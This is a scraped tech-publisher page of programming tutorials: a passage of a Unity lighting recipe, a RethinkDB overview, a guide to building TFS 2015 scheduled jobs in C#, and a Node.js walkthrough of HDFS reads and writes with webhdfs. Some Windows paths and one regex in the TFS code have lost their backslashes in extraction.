if(Input.GetButton("Fire1")){ float lerpSpeed = Mathf.Sin (Time.time * 10f); lerpSpeed = Mathf.Abs(lerpSpeed); Color lerpColor = Color.Lerp(regularColor, firingColor, lerpSpeed); line.material.SetColor("_TintColor", lerpColor); } if(Input.GetButtonUp("Fire1")){ line.material.SetColor("_TintColor", regularColor); } } } Save your script and attach it to the LaserProjector game object. Select the LaserProjector GameObject. From the Inspector view, find the Laser Aim component and fill the Line Material slot with the Line_Mat material, as shown: Play the scene. The laser aim is ready, and looks as shown: In this recipe, the width of the laser beam and its aim dot have been exaggerated. Should you need a more realistic thickness for your beam, change the Line Width field of the Laser Aim component to 0.05, and the Orthographic Size of the Projector component to 0.025. Also, remember to make the beam more opaque by setting the Regular Color of the Laser Aim component brighter. How it works... The laser aim effect was achieved by combining two different effects: a Projector and Line Renderer. A Projector, which can be used to simulate light, shadows, and more, is a component that projects a material (and its texture) onto other game objects. By attaching a projector to the Laser Pointer object, we have ensured that it will face the right direction at all times. To get the right, vibrant look, we have edited the projector material's Shader, making it brighter. Also, we have scripted a way to prevent projections from going through objects, by setting its Far Clip Plane on approximately the same level of the first object that is receiving the projection. The line of code that is responsible for this action is—proj.farClipPlane = hit.distance + margin;. Regarding the Line Renderer, we have opted to create it dynamically, via code, instead of manually adding the component to the game object. The code is also responsible for setting up its appearance, updating the line vertices position, and changing its color whenever the fire button is pressed, giving it a glowing/pulsing look. For more details on how the script works, don't forget to check out the commented code, available within the 1362_06_03 | End folder. Reflecting surrounding objects with Reflection Probes If you want your scene's environment to be reflected by game objects, featuring reflective materials (such as the ones with high Metallic or Specular levels), then you can achieve such effect using Reflection Probes. They allow for real-time, baked, or even custom reflections through the use of Cubemaps. Real-time reflections can be expensive in terms of processing; in which case, you should favor baked reflections, unless it's really necessary to display dynamic objects being reflected (mirror-like objects, for instance). Still, there are some ways real-time reflections can be optimized. In this recipe, we will test three different configurations for reflection probes: Real-time reflections (constantly updated) Real-time reflections (updated on-demand) via script Baked reflections (from the Editor) Getting ready For this recipe, we have prepared a basic scene, featuring three sets of reflective objects: one is constantly moving, one is static, and one moves whenever it is interacted with. The Probes.unitypackage package that is containing the scene can be found inside the 1362_06_04 folder. How to do it... To reflect the surrounding objects using the Reflection probes, follow these steps: Import Probes.unitypackage to a new project. Then, open the scene named Probes. This is a basic scene featuring three sets of reflective objects. Play the scene. Observe that one of the systems is dynamic, one is static, and one rotates randomly, whenever a key is pressed. Stop the scene. First, let's create a constantly updated real-time reflection probe. From the Create drop-down button of the Hierarchy view, add a Reflection Probe to the scene (Create | Light | Reflection Probe). Name it as RealtimeProbe and make it a child of the System 1 Realtime | MainSphere game object. Then, from the Inspector view, the Transform component, change its Position to X: 0; Y: 0; Z: 0, as shown: Now, go to the Reflection Probe component. Set Type as Realtime; Refresh Mode as Every Frame and Time Slicing as No time slicing, shown as follows: Play the scene. The reflections will be now be updated in real time. Stop the scene. Observe that the only object displaying the real-time reflections is System 1 Realtime | MainSphere. The reason for this is the Size of the Reflection Probe. From the Reflection Probe component, change its Size to X: 25; Y: 10; Z: 25. Note that the small red spheres are now affected as well. However, it is important to notice that all objects display the same reflection. Since our reflection probe's origin is placed at the same location as the MainSphere, all reflective objects will display reflections from that point of view. If you want to eliminate the reflection from the reflective objects within the reflection probe, such as the small red spheres, select the objects and, from the Mesh Renderer component, set Reflection Probes as Off, as shown in the following screenshot: Add a new Reflection Probe to the scene. This time, name it OnDemandProbe and make it a child of the System 2 On Demand | MainSphere game object. Then, from the Inspector view, Transform component, change its Position to X: 0; Y: 0; Z: 0. Now, go to the Reflection Probe component. Set Type as Realtime, Refresh Mode as Via scripting, and Time Slicing as Individual faces, as shown in the following screenshot: Using the Create drop-down menu in the Project view, create a new C# Script named UpdateProbe. Open your script and replace everything with the following code: using UnityEngine; using System.Collections; public class UpdateProbe : MonoBehaviour { private ReflectionProbe probe; void Awake () { probe = GetComponent<ReflectionProbe> (); probe.RenderProbe(); } public void RefreshProbe(){ probe.RenderProbe(); } } Save your script and attach it to the OnDemandProbe. Now, find the script named RandomRotation, which is attached to the System 2 On Demand | Spheres object, and open it in the code editor. Right before the Update() function, add the following lines: private GameObject probe; private UpdateProbe up; void Awake(){ probe = GameObject.Find("OnDemandProbe"); up = probe.GetComponent<UpdateProbe>(); } Now, locate the line of code called transform.eulerAngles = newRotation; and, immediately after it, add the following line: up.RefreshProbe(); Save the script and test your scene. Observe how the Reflection Probe is updated whenever a key is pressed. Stop the scene. Add a third Reflection Probe to the scene. Name it as CustomProbe and make it a child of the System 3 On Custom | MainSphere game object. Then, from the Inspector view, the Transform component, change its Position to X: 0; Y: 0; Z: 0. Go to the Reflection Probe component. Set Type as Custom and click on the Bake button, as shown: A Save File dialog window will show up. Save the file as CustomProbe-reflectionHDR.exr. Observe that the reflection map does not include the reflection of red spheres on it. To change this, you have two options: set the System 3 On Custom | Spheres GameObject (and all its children) as Reflection Probe Static or, from the Reflection Probe component of the CustomProbe GameObject, check the Dynamic Objects option, as shown, and bake the map again (by clicking on the Bake button). If you want your reflection Cubemap to be dynamically baked while you edit your scene, you can set the Reflection Probe Type to Baked, open the Lighting window (the Assets | Lighting menu), access the Scene section, and check the Continuous Baking option as shown. Please note that this mode won't include dynamic objects in the reflection, so be sure to set System 3 Custom | Spheres and System 3 Custom | MainSphere as Reflection Probe Static. How it works... The Reflection Probes element act like omnidirectional cameras that render Cubemaps and apply them onto the objects within their constraints. When creating Reflection Probes, it's important to be aware of how the different types work: Real-time Reflection Probes: Cubemaps are updated at runtime. The real-time Reflection Probes have three different Refresh Modes: On Awake (Cubemap is baked once, right before the scene starts); Every frame (Cubemap is constantly updated); Via scripting (Cubemap is updated whenever the RenderProbe function is used).Since Cubemaps feature six sides, the Reflection Probes features Time Slicing, so each side can be updated independently. There are three different types of Time Slicing: All Faces at Once (renders all faces at once and calculates mipmaps over 6 frames. Updates the probe in 9 frames); Individual Faces (each face is rendered over a number of frames. It updates the probe in 14 frames. The results can be a bit inaccurate, but it is the least expensive solution in terms of frame-rate impact); No Time Slicing (The Probe is rendered and mipmaps are calculated in one frame. It provides high accuracy, but it also the most expensive in terms of frame-rate). Baked: Cubemaps are baked during editing the screen. Cubemaps can be either manually or automatically updated, depending whether the Continuous Baking option is checked (it can be found at the Scene section of the Lighting window). Custom: The Custom Reflection Probes can be either manually baked from the scene (and even include Dynamic objects), or created from a premade Cubemap. There's more... There are a number of additional settings that can be tweaked, such as Importance, Intensity, Box Projection, Resolution, HDR, and so on. For a complete view on each of these settings, we strongly recommend that you read Unity's documentation on the subject, which is available at http://docs.unity3d.com/Manual/class-ReflectionProbe.html. Setting up an environment with Procedural Skybox and Directional Light Besides the traditional 6 Sided and Cubemap, Unity now features a third type of skybox: the Procedural Skybox. Easy to create and setup, the Procedural Skybox can be used in conjunction with a Directional Light to provide Environment Lighting to your scene. In this recipe, we will learn about different parameters of the Procedural Skybox. Getting ready For this recipe, you will need to import Unity's Standard Assets Effects package, which you should have installed when installing Unity. How to do it... To set up an Environment Lighting using the Procedural Skybox and Directional Light, follow these steps: Create a new scene inside a Unity project. Observe that a new scene already includes two objects: the Main Camera and a Directional Light. Add some cubes to your scene, including one at Position X: 0; Y: 0; Z: 0 scaled to X: 20; Y: 1; Z: 20, which is to be used as the ground, as shown: Using the Create drop-down menu from the Project view, create a new Material and name it MySkybox. From the Inspector view, use the appropriate drop-down menu to change the Shader of MySkybox from Standard to Skybox/Procedural. Open the Lighting window (menu Window | Lighting), access the Scene section. At the Environment Lighting subsection, populate the Skybox slot with the MySkybox material, and the Sun slot with the Directional Light from the Scene. From the Project view, select MySkybox. Then, from the Inspector view, set Sun size as 0.05 and Atmosphere Thickness as 1.4. Experiment by changing the Sky Tint color to RGB: 148; 128; 128, and the Ground color to a value that resembles the scene cube floor's color (such as RGB: 202; 202; 202). If you feel the scene is too bright, try bringing the Exposure level down to 0.85, shown as follows: Select the Directional Light and change its Rotation to X: 5; Y: 170; Z: 0. Note that the scene should resemble a dawning environment, something like the following scene: Let's make things even more interesting. Using the Create drop-down menu in the Project view, create a new C# Script named RotateLight. Open your script and replace everything with the following code: using UnityEngine; using System.Collections; public class RotateLight : MonoBehaviour { public float speed = -1.0f; void Update () { transform.Rotate(Vector3.right * speed * Time.deltaTime); } } Save it and add it as a component to the Directional Light. Import the Effects Assets package into your project (via the Assets | Import Package | Effects menu). Select the Directional Light. Then, from Inspector view, Light component, populate the Flare slot with the Sun flare. From the Scene section of the Lighting window, find the Other Settings subsection. Then, set Flare Fade Speed as 3 and Flare Strength as 0.5, shown as follows: Play the scene. You will see the sun rising and the Skybox colors changing accordingly. How it works... Ultimately, the appearance of Unity's native Procedural Skyboxes depends on the five parameters that make them up: Sun size: The size of the bright yellow sun that is drawn onto the skybox is located according to the Directional Light's Rotation on the X and Y axes. Atmosphere Thickness: This simulates how dense the atmosphere is for this skybox. Lower values (less than 1.0) are good for simulating the outer space settings. Moderate values (around 1.0) are suitable for the earth-based environments. Values that are slightly above 1.0 can be useful when simulating air pollution and other dramatic settings. Exaggerated values (like more than 2.0) can help to illustrate extreme conditions or even alien settings. Sky Tint: It is the color that is used to tint the skybox. It is useful for fine-tuning or creating stylized environments. Ground: This is the color of the ground. It can really affect the Global Illumination of the scene. So, choose a value that is close to the level's terrain and/or geometry (or a neutral one). Exposure: This determines the amount of light that gets in the skybox. The higher levels simulate overexposure, while the lower values simulate underexposure. It is important to notice that the Skybox appearance will respond to the scene's Directional Light, playing the role of the Sun. In this case, rotating the light around its X axis can create dawn and sunset scenarios, whereas rotating it around its Y axis will change the position of the sun, changing the cardinal points of the scene. Also, regarding the Environment Lighting, note that although we have used the Skybox as the Ambient Source, we could have chosen a Gradient or a single Color instead—in which case, the scene's illumination wouldn't be attached to the Skybox appearance. Finally, also regarding the Environment Lighting, please note that we have set the Ambient GI to Realtime. The reason for this was to allow the real-time changes in the GI, promoted by the rotating Directional Light. In case we didn't need these changes at runtime, we could have chosen the Baked alternative. Summary In this article you have learned and had hands-on approach to a number Unity's lighting system features, such as cookie textures, Reflection maps, Lightmaps, Light and Reflection probes, and Procedural Skyboxes. The article also demonstrated the use of Projectors. Resources for Article: Further resources on this subject: Animation features in Unity 5[article] Scripting Strategies[article] Editor Tool, Prefabs, and Main Menu [article]
Read more
  • 0
  • 0
  • 21105

article-image-learning-rethinkdb
Jonathan Pollack
28 Sep 2015
6 min read
Save for later

Learning RethinkDB

Jonathan Pollack
28 Sep 2015
6 min read
RethinkDB is a relatively new, fully open-source NoSQL database, featuring: ridiculously easy sharding, replicating, & database management, table joins (that’s right!), geospatial & time-series support, and real-time monitoring of complicated queries. I think the feature list alone makes this a piece of tech worth looking further into, to say nothing of the fact that we’ll likely be seeing an explosion of apps that use RethinkDB as their fundamental database–so developers, get ready to have to learn about yet another database. That said, like any tool, you should consult your doctor when deciding if RethinkDB is right for you. When to avoid Like most NoSQL offerings, RethinkDB has a few conscience trade-offs in its design, most notably when it comes to ACID compliance, and the CAP-theorem. If you need a fully ACID compliant database, or strong type checking across your schema, you would be better served by a traditional SQL database. If you absolutely need write availability over data consistency–RethinkDB favors consistency. Also, because of how queries are performed and returned, “big data” use cases are probably not a great fit for this database–specifically if you want to handle results larger than 64 MB, or are performing computationally intensive work on your stored data. When to consider You want a great web-based management console for data-center configuration (sharding, replication, etc.), database monitoring, and testing queries. You want the flexibility of a schema-less database, with the ability to easily express relationships via table joins. You need to perform geospatial queries (e.g. find all documents with locations within 5km of a given point). You deal with time series data, especially across various times zones. You need to push data to your client based off of realtime changes to your data, as a result of complex queries. Management console The web console is insanely easy to use, and gives you all of the control you need for administrating your data-center–even if it is only a data-center of one database. Setting up a data-center is just a matter of pointing your new database to an existing node in a cluster. Once that’s done, you can use the web console to shard (and re-shard) your data, as well as determine how many replicas you want floating around. You can also run queries (and profile those queries) against your databases straight form the web console, giving you quick access to your data and performance. Table joins (capturing data relations) One of the best pieces of syntatic sugar that RethinkDB provides, in my opinion, is the ability to do table joins. While, certainly, this isn’t that magical–what we’re doing is essentially a nested query via a specified field to be used as the nested lookup’s primary key–it really does make queries easy to read and compose. r.table("table1").eq_join("doc_field_as_table2_primary_key", r.table("table2")).zip().run() Even more awesomely, the JavaScript ORM Thinky allows for very slick, seamless query-level joins, based on the same principal. Geospatial primitives Given that location aware queries are becoming more and more popular, if not downright necessary, it’s great to see that RethinkDB comes with support for the following geometric primitives:point, line, polygon (at least 3 sided), circle, and polygonSub (subtract one polygon from the larger, enclosing polygon). It allows for the following types of queries: distance, intersects, includes, getIntersecting, and getNearest. For example, you can find all of the documents within 5 km of Greenwich, England. r.table("table1").getNearest(r.point(0,0), {index: "table1_geo_index", maxDist: 5, unit: "km"}).run() Time-series support (sane date & time primitives) Official drivers do native conversions for you, which means timezone-aware context driven queries can be made that allow you to find documents that occurred at a given time on a given day in a given timezone. Some other cool features: Times can be used as indexes. Time operations are handled on the database, allowing them to be executed across the cluster effortlessly. Take, for example, the desire to figure out how many customer support tickets were coming in between 9 am, and 5 pm, every day. We don’t want to have to figure out how to offset the time-stamp on each document, given that the timezones could each be different. Thankfully, RethinkDB will do this accounting, and spread out the computation across the cluster without asking us for a thing. r.table('customer-support-tickets').filter(function (ticket) { // ticket.hours() is automatically dealt with in its own timezone return ticket('time').hours().lt(9).or( ticket('time').hours().ge(17)); }).count().run(); Realtime query result monitoring (change feeds) Probably by far and away the most impressive feature of RethinkDB has to be change-feeds. You can turn almost every practical query that you would want to monitor into a live stream of changes just by chaining the function call changes() to the end. For example, monitor the changes to a given table: r.table("table1").changes().run() or to a given query (the ordering of a table, for instance): r.table("table1").orderBy("key").changes().run() And of course, the queries can be made more complicated, but these examples above should blow your mind. No more pulling, no more having to come up with the data diffs yourself before pushing them to the client. RethinkDB will do the diff for you, and push the results straight to your server. There is one caveat here, however; while this is decent for order-of-magnitude: 10 clients, it is more efficient to couple your change-feeds to a pub-sub service when pushing to many clients. Conclusion RethinkDB has a lot of cool things to be excited about: ReQL (it’s readable, highly functional syntax), cluster management, primitives for 21st century applications, and change-feeds. And you know what, if RethinkDB only had change-feeds, I would still be extremely excited about it–think of all that time you no longer have to spend banging your head against the wall trying to deal with consistence and concurrency issues! If you are thinking about starting a new project, or are tired of fighting with your current NoSQL database, and don’t have any requirements in the “avoid camp”, you should highly consider using RethinkDB. About the author Jonathan Pollack is a full stack developer living in Berlin. He previously worked as a web developer at a public shoe company, and prior to that, worked at a start up that’s trying to build the world’s best pan-cloud virtualization layer. He can be found on Twitter @murphydanger.
Read more
  • 0
  • 0
  • 2228
Unlock access to the largest independent learning library in Tech for FREE!
Get unlimited access to 7500+ expert-authored eBooks and video courses covering every tech area you can think of.
Renews at $19.99/month. Cancel anytime
article-image-creating-tfs-scheduled-jobs
Packt
28 Sep 2015
12 min read
Save for later

Creating TFS Scheduled Jobs

Packt
28 Sep 2015
12 min read
In this article by Gordon Beeming, the author of the book, Team Foundation Server 2015 Customization, we are going to cover TFS scheduled jobs. The topics that we are going to cover include: Writing a TFS Job Deploying a TFS Job Removing a TFS Job You would want to write a scheduled job for any logic that needs to be run at specific times, whether it is at certain increments or at specific times of the day. A scheduled job is not the place to put logic that you would like to run as soon as some other event, such as a check-in or a work item change, occurs. It will automatically link change sets to work items based on the comments. (For more resources related to this topic, see here.) The project setup First off, we'll start with our project setup. This time, we'll create a Windows console application. Creating a new windows console application The references that we'll need this time around are: Microsoft.VisualStudio.Services.WebApi.dll Microsoft.TeamFoundation.Common.dll Microsoft.TeamFoundation.Framework.Server.dll All of these can be found in C:Program FilesMicrosoft Team Foundation Server 14.0Application TierTFSJobAgent on the TFS server. That's all the setup that is required for your TFS job project. Any class that inherit ITeamFoundationJobExtension will be able to be used for a TFS Job. Writing the TFS job So, as mentioned, we are going to need a class that inherits from ITeamFoundationJobExtension. Let's create a class called TfsCommentsToChangeSetLinksJob and inherit from ITeamFoundationJobExtension. As part of this, we will need to implement the Run method, which is part of an interface, like this: public class TfsCommentsToChangeSetLinksJob : ITeamFoundationJobExtension { public TeamFoundationJobExecutionResult Run( TeamFoundationRequestContext requestContext, TeamFoundationJobDefinition jobDefinition, DateTime queueTime, out string resultMessage) { throw new NotImplementedException(); } } Then, we also add the using statement: using Microsoft.TeamFoundation.Framework.Server; Now, for this specific extension, we'll need to add references to the following: Microsoft.TeamFoundation.Client.dll Microsoft.TeamFoundation.VersionControl.Client.dll Microsoft.TeamFoundation.WorkItemTracking.Client.dll All of these can be found in C:Program FilesMicrosoft Team Foundation Server 14.0Application TierTFSJobAgent. Now, for the logic of our plugin, we use the following code inside of the Run method as a basic shell, where we'll then place the specific logic for this plugin. This basic shell will be adding a try catch block, and at the end of the try block, it will return a successful job run. We'll then add to the job message what exception may be thrown and returning that the job failed: resultMessage = string.Empty; try { // place logic here return TeamFoundationJobExecutionResult.Succeeded; } catch (Exception ex) { resultMessage += "Job Failed: " + ex.ToString(); return TeamFoundationJobExecutionResult.Failed; } Along with this code, you will need the following using function: using Microsoft.TeamFoundation; using Microsoft.TeamFoundation.Client; using Microsoft.TeamFoundation.VersionControl.Client; using Microsoft.TeamFoundation.WorkItemTracking.Client; using System.Linq; using System.Text.RegularExpressions; So next, we need to place some logic specific to this job in the try block. First, let's create a connection to TFS for version control: TfsTeamProjectCollection tfsTPC = TfsTeamProjectCollectionFactory.GetTeamProjectCollection( new Uri("http://localhost:8080/tfs")); VersionControlServer vcs = tfsTPC.GetService<VersionControlServer>(); Then, we will query the work item store's history and get the last 25 check-ins: WorkItemStore wis = tfsTPC.GetService<WorkItemStore>(); // get the last 25 check ins foreach (Changeset changeSet in vcs.QueryHistory("$/", RecursionType.Full, 25)) { // place the next logic here } Now that we have the changeset history, we are going to check the comments for any references to work items using a simple regex expression: //try match the regex for a hash number in the comment foreach (Match match in Regex.Matches((changeSet.Comment ?? string.Empty), @"#d{1,}")) { // place the next logic here } Getting into this loop, we'll know that we have found a valid number in the comment and that we should attempt to link the check-in to that work item. But just the fact that we have found a number doesn't mean that the work item exists, so let's try find a work item with the found number: int workItemId = Convert.ToInt32(match.Value.TrimStart('#')); var workItem = wis.GetWorkItem(workItemId); if (workItem != null) { // place the next logic here } Here, we are checking to make sure that the work item exists so that if the workItem variable is not null, then we'll proceed to check whether a relationship for this changeSet and workItem function already exists: //now create the link ExternalLink changesetLink = new ExternalLink( wis.RegisteredLinkTypes[ArtifactLinkIds.Changeset], changeSet.ArtifactUri.AbsoluteUri); //you should verify if such a link already exists if (!workItem.Links.OfType<ExternalLink>() .Any(l => l.LinkedArtifactUri == changeSet.ArtifactUri.AbsoluteUri)) { // place the next logic here } If a link does not exist, then we can add a new link: changesetLink.Comment = "Change set " + $"'{changeSet.ChangesetId}'" + " auto linked by a server plugin"; workItem.Links.Add(changesetLink); workItem.Save(); resultMessage += $"Linked CS:{changeSet.ChangesetId} " + $"to WI:{workItem.Id}"; We just have the extra bit here so as to get the last 25 change sets. If you were using this for production, you would probably want to store the last change set that you processed and then get history up until that point, but I don't think it's needed to illustrate this sample. Then, after getting the list of change sets, we basically process everything 100 percent as before. We check whether there is a comment and whether that comment contains a hash number that we can try linking to a changeSet function. We then check whether a workItem function exists for the number that we found. Next, we add a link to the work item from the changeSet function. Then, for each link we add to the overall resultMessage string so that when we look at the results from our job running, we can see which links were added automatically for us. As you can see, with this approach, we don't interfere with the check-in itself but rather process this out-of-hand way of linking changeSet to work with items at a later stage. Deploying our TFS Job Deploying the code is very simple; change the project's Output type to Class Library. This can be done by going to the project properties, and then in the Application tab, you will see an Output type drop-down list. Now, build your project. Then, copy the TfsJobSample.dll and TfsJobSample.pdb output files to the scheduled job plugins folder, which is C:Program FilesMicrosoft Team Foundation Server 14.0Application TierTFSJobAgentPlugins. Unfortunately, simply copying the files into this folder won't make your scheduled job automatically installed, and the reason for this is that as part of the interface of the scheduled job, you don't specify when to run your job. Instead, you register the job as a separate step. Change Output type back to Console Application option for the next step. You can, and should, split the TFS job from its installer into different projects, but in our sample, we'll use the same one. Registering, queueing, and deregistering a TFS Job If you try install the job the way you used to in TFS 2013, you will now get the TF400444 error: TF400444: The creation and deletion of jobs is no longer supported. You may only update the EnabledState or Schedule of a job. Failed to create, delete or update job id 5a7a01e0-fff1-44ee-88c3-b33589d8d3b3 This is because they have made some changes to the job service, for security reasons, and these changes prevent you from using the Client Object Model. You are now forced to use the Server Object Model. The code that you have to write is slightly more complicated and requires you to copy your executable to multiple locations to get it working properly. Place all of the following code in your program.cs file inside the main method. We start off by getting some arguments that are passed through to the application, and if we don't get at least one argument, we don't continue: #region Collect commands from the args if (args.Length != 1 && args.Length != 2) { Console.WriteLine("Usage: TfsJobSample.exe <command "+ "(/r, /i, /u, /q)> [job id]"); return; } string command = args[0]; Guid jobid = Guid.Empty; if (args.Length > 1) { if (!Guid.TryParse(args[1], out jobid)) { Console.WriteLine("Job Id not a valid Guid"); return; } } #endregion We then wrap all our logic in a try catch block, and for our catch, we only write the exception that occurred: try { // place logic here } catch (Exception ex) { Console.WriteLine(ex.ToString()); } Place the next steps inside the try block, unless asked to do otherwise. As part of using the Server Object Model, you'll need to create a DeploymentServiceHost. This requires you to have a connection string to the TFS Configuration database, so make sure that the connection string set in the following is valid for you. We also need some other generic path information, so we'll mimic what we could expect the job agents' paths to be: #region Build a DeploymentServiceHost string databaseServerDnsName = "localhost"; string connectionString = $"Data Source={databaseServerDnsName};"+ "Initial Catalog=TFS_Configuration;Integrated Security=true;"; TeamFoundationServiceHostProperties deploymentHostProperties = new TeamFoundationServiceHostProperties(); deploymentHostProperties.HostType = TeamFoundationHostType.Deployment | TeamFoundationHostType.Application; deploymentHostProperties.Id = Guid.Empty; deploymentHostProperties.PhysicalDirectory = @"C:Program FilesMicrosoft Team Foundation Server 14.0"+ @"Application TierTFSJobAgent"; deploymentHostProperties.PlugInDirectory = $@"{deploymentHostProperties.PhysicalDirectory}Plugins"; deploymentHostProperties.VirtualDirectory = "/"; ISqlConnectionInfo connInfo = SqlConnectionInfoFactory.Create(connectionString, null, null); DeploymentServiceHost host = new DeploymentServiceHost(deploymentHostProperties, connInfo, true); #endregion Now that we have a TeamFoundationServiceHost function, we are able to create a TeamFoundationRequestContext function . We'll need it to call methods such as UpdateJobDefinitions, which adds and/or removes our job, and QueryJobDefinition, which is used to queue our job outside of any schedule: using (TeamFoundationRequestContext requestContext = host.CreateSystemContext()) { TeamFoundationJobService jobService = requestContext.GetService<TeamFoundationJobService>() // place next logic here } We then create a new TeamFoundationJobDefinition instance with all of the information that we want for our TFS job, including the name, schedule, and enabled state: var jobDefinition = new TeamFoundationJobDefinition( "Comments to Change Set Links Job", "TfsJobSample.TfsCommentsToChangeSetLinksJob"); jobDefinition.EnabledState = TeamFoundationJobEnabledState.Enabled; jobDefinition.Schedule.Add(new TeamFoundationJobSchedule { ScheduledTime = DateTime.Now, PriorityLevel = JobPriorityLevel.Normal, Interval = 300, }); Once we have the job definition, we check what the command was and then execute the code that will relate to that command. For the /r command, we will just run our TFS job outside of the TFS job agent: if (command == "/r") { string resultMessage; new TfsCommentsToChangeSetLinksJob().Run(requestContext, jobDefinition, DateTime.Now, out resultMessage); } For the /i command, we will install the TFS job: else if (command == "/i") { jobService.UpdateJobDefinitions(requestContext, null, new[] { jobDefinition }); } For the /u command, we will uninstall the TFS Job: else if (command == "/u") { jobService.UpdateJobDefinitions(requestContext, new[] { jobid }, null); } Finally, with the /q command, we will queue the TFS job to be run inside the TFS job agent and outside of its schedule: else if (command == "/q") { jobService.QueryJobDefinition(requestContext, jobid); } Now that we have this code in the program.cs file, we need to compile the project and then copy TfsJobSample.exe and TfsJobSample.pdb to the TFS Tools folder, which is C:Program FilesMicrosoft Team Foundation Server 14.0Tools. Now open a cmd window as an administrator. Change the directory to the Tools folder and then run your application with a /i command, as follows: Installing the TFS Job Now, you have successfully installed the TFS Job. To uninstall it or force it to be queued, you will need the job ID. But basically you have to run /u with the job ID to uninstall, like this: Uninstalling the TFS Job You will be following the same approach as prior for queuing, simply specifying the /q command and the job ID. How do I know whether my TFS Job is running? The easiest way to check whether your TFS Job is running or not is to check out the job history table in the configuration database. To do this, you will need the job ID (we spoke about this earlier), which you can obtain by running the following query against the TFS_Configuration database: SELECT JobId FROM Tfs_Configuration.dbo.tbl_JobDefinition WITH ( NOLOCK ) WHERE JobName = 'Comments to Change Set Links Job' With this JobId, we will then run the following lines to query the job history: SElECT * FROM Tfs_Configuration.dbo.tbl_JobHistory WITH (NOLOCK) WHERE JobId = '<place the JobId from previous query here>' This will return you a list of results about the previous times the job was run. If you see that your job has a Result of 6 which is extension not found, then you will need to stop and restart the TFS job agent. You can do this by running the following commands in an Administrator cmd window: net stop TfsJobAgent net start TfsJobAgent Note that when you stop the TFS job agent, any jobs that are currently running will be terminated. Also, they will not get a chance to save their state, which, depending on how they were written, could lead to some unexpected situations when they start again. After the agent has started again, you will see that the Result field is now different as it is a job agent that will know about your job. If you prefer browsing the web to see the status of your jobs, you can browse to the job monitoring page (_oi/_jobMonitoring#_a=history), for example, http://gordon-lappy:8080/tfs/_oi/_jobMonitoring#_a=history. This will give you all the data that you can normally query but with nice graphs and grids. Summary In this article, we looked at how to write, install, uninstall, and queue a TFS Job. You learned that the way we used to install TFS Jobs will no longer work for TFS 2015 because of a change in the Client Object Model for security. Resources for Article: Further resources on this subject: Getting Started with TeamCity[article] Planning for a successful integration[article] Work Item Querying [article]
Read more
  • 0
  • 0
  • 13863

article-image-introduction-using-nodejs-hadoops-mapreduce-jobs
Harri Siirak
25 Sep 2015
5 min read
Save for later

Using Node.js and Hadoop to store distributed data

Harri Siirak
25 Sep 2015
5 min read
Hadoop is a well-known open-source software framework for distributed storage and distributed processing of very large data sets on computer clusters built from commodity hardware. It's designed with a fundamental assumption that hardware failures can (and will) happen and thus should be automatically handled in software by the framework. Under the hood it's using HDFS (Hadoop Distributed File System) for the data storage. HDFS can store large files across multiple machines and it achieves reliability by replicating the data across multiple hosts (default replication factor is 3 and can be configured to be higher when needed). Although it's designed for mostly immutable files and may not be suitable for systems requiring concurrent write-operations. Its target usage is not only restricted to MapReduce jobs, but it also can be used for cost effective and reliable data storage. In the following examples, I am going to give you an overview of how to establish connections to HDFS storage (namenode) and how to perform basic operations on the data. As you can probably guess, I'm using Node.js to build these examples. Node.js is a platform built on Chrome's JavaScript runtime for easily building fast, scalable network applications. Node.js uses an event-driven, non-blocking I/O model that makes it lightweight and efficient, perfect for data-intensive real-time applications that run across distributed devices. So it's really ideal for what I want to show you next. Two popular libraries for acccessing HDFS in Node.js are node-hdfs and webhdfs. The first one uses Hadoop's native libhdfs library and protocol to communicate with Hadoop namenode, albeit it seems to be not maintained anymore and doesn't support Stream API. Another one is using WebHDFS, which defines a public HTTP REST API, directly built into Hadoop's core (namenodes and datanodes both) and which permits clients to access Hadoop from multiple languages without installing Hadoop, and supports all HDFS user operations including reading files, writing to files, making directories, changing permissions and renaming. More details about WebHDFS REST API and about its implementation details and response codes/types can be found from here. At this point I'm assuming that you have Hadoop cluster up and running. There are plenty of good tutorials out there showing how to setup and run Hadoop cluster (single and multi node). Installing and using the webhdfs library webhdfs implements most of the REST API calls, albeit it's not yet supporting Hadoop delegation tokens. It's also Stream API compatible what makes its usage pretty straightforward and easy. Detailed examples and use cases for another supported calls can be found from here. Install webhdfs from npm: npm install wehbhdfs Create a new script named webhdfs-client.js: // Include webhdfs module var WebHDFS = require('webhdfs'); // Create a new var hdfs = WebHDFS.createClient({ user: 'hduser', // Hadoop user host: 'localhost', // Namenode host port: 50070 // Namenode port }); module.exports = hdfs; Here we initialized new webhdfs client with options, including namenode's host and port where we are connecting to. Let's proceed with a more detailed example. Storing file data in HDFS Create a new script named webhdfs-write-test.js and add the code below. // Include created client var hdfs = require('./webhdfs-client'); // Include fs module for local file system operations var fs = require('fs'); // Initialize readable stream from local file // Change this to real path in your file system var localFileStream = fs.createReadStream('/path/to/local/file'); // Initialize writable stream to HDFS target var remoteFileStream = hdfs.createWriteStream('/path/to/remote/file'); // Pipe data to HDFS localFileStream.pipe(remoteFileStream); // Handle errors remoteFileStream.on('error', function onError (err) { // Do something with the error }); // Handle finish event remoteFileStream.on('finish', function onFinish () { // Upload is done }); Basically what we are doing here is that we're initializing readable file stream from a local filesystem and piping its contents seamlessly into remote HDFS target. Optionally webhdfs exposes error and finish. Reading file data from HDFS Let's retrieve the data what we just stored in HDFS storage. Create a new script named webhdfs-read-test.js and add code below. var hdfs = require('./webhdfs-client'); var fs = require('fs'); // Initialize readable stream from HDFS source var remoteFileStream = hdfs.createReadStream('/path/to/remote/file'); // Variable for storing data var data = new Buffer(); remoteFileStream.on('error', function onError (err) { // Do something with the error }); remoteFileStream.on('data', function onChunk (chunk) { // Concat received data chunk data = Buffer.concat([ data, chunk ]); }); remoteFileStream.on('finish', function onFinish () { // Upload is done // Print received data console.log(data.toString()); }); What's next? Now when we have data in Hadoop cluster, we can start processing it by spawning some MapReduce jobs, and when it's processed we can retrieve the output data. In the second part of this article, I'm going to give you an overview of how Node.js can be used as part of MapReduce jobs. About the author Harri is a senior Node.js/Javascript developer among a talented team of full-stack developers who specialize in building scalable and secure Node.js based solutions. He can be found on Github at harrisiirak.
Read more
  • 0
  • 2
  • 19157

article-image-building-jsf-forms
Packt
25 Sep 2015
16 min read
Save for later

Building JSF Forms

Packt
25 Sep 2015
16 min read
